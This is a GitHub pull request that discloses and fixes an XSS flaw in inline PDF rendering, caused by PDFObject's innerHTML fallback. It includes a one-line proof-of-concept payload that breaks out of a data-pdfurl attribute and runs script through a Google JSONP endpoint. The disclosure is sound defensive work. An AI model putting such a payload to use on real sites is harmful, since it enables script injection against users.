Skip to content

fix: sanitize pdf url to prevent XSS on inline PDFs #1832

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
Yukaii merged 1 commit into from
Dec 26, 2023
Merged

fix: sanitize pdf url to prevent XSS on inline PDFs #1832

Yukaii merged 1 commit into from
Dec 26, 2023

Conversation

@EastSun5566
Copy link
Contributor

@EastSun5566 EastSun5566 commented Dec 15, 2023

Hi team,

Consider the following example, which can trigger an alert popup when inline PDFs are unsupported (like on mobile devices):

# XSS 6

<span class="pdf raw" data-pdfurl="'><iframe srcdoc='ww<script src=&quot;https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(document.domain)//&quot;></script>'></iframe><p data-x='"></span>

The issue arises because PDFObject uses innerHTML to insert concatenated fallbackHTML, which could lead to XSS vulnerabilities. For more information, refer to pipwerks/PDFObject#296

This can be seen in the code at the following locations:

https://github.com/pipwerks/PDFObject/blob/2c0bbd90d4de64598ff6df9e1af32de2d58a6eb9/pdfobject.js#L275
https://github.com/pipwerks/PDFObject/blob/2c0bbd90d4de64598ff6df9e1af32de2d58a6eb9/pdfobject.js#L323-L329

I think we should sanitize the URL before passing it to PDFObject.embed. This approach should fix the problem.

@EastSun5566 EastSun5566 self-assigned this Dec 15, 2023
@EastSun5566
fix: sanitize pdf url to prevent xss
11cd200 
Signed-off-by: Michael Wang <michael19920327@gmail.com>
@EastSun5566 EastSun5566 force-pushed the bugfix/sanitize-url-to-prevent-xss branch from f07f41f to 11cd200 Compare December 15, 2023 14:15
@Yukaii Yukaii added this to the Next milestone Dec 26, 2023
@Yukaii Yukaii merged commit dca7f8c into develop Dec 26, 2023
@Yukaii Yukaii deleted the bugfix/sanitize-url-to-prevent-xss branch December 26, 2023 07:51
@Yukaii Yukaii modified the milestones: Next, 2.5.0 Dec 26, 2023
@stanley2058 stanley2058 mentioned this pull request Dec 26, 2023
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@Yukaii Yukaii Yukaii approved these changes

Assignees

@EastSun5566 EastSun5566

Labels

None yet

Projects

None yet

Milestone

2.5.0

Development

Successfully merging this pull request may close these issues.

3 participants

@EastSun5566 @Yukaii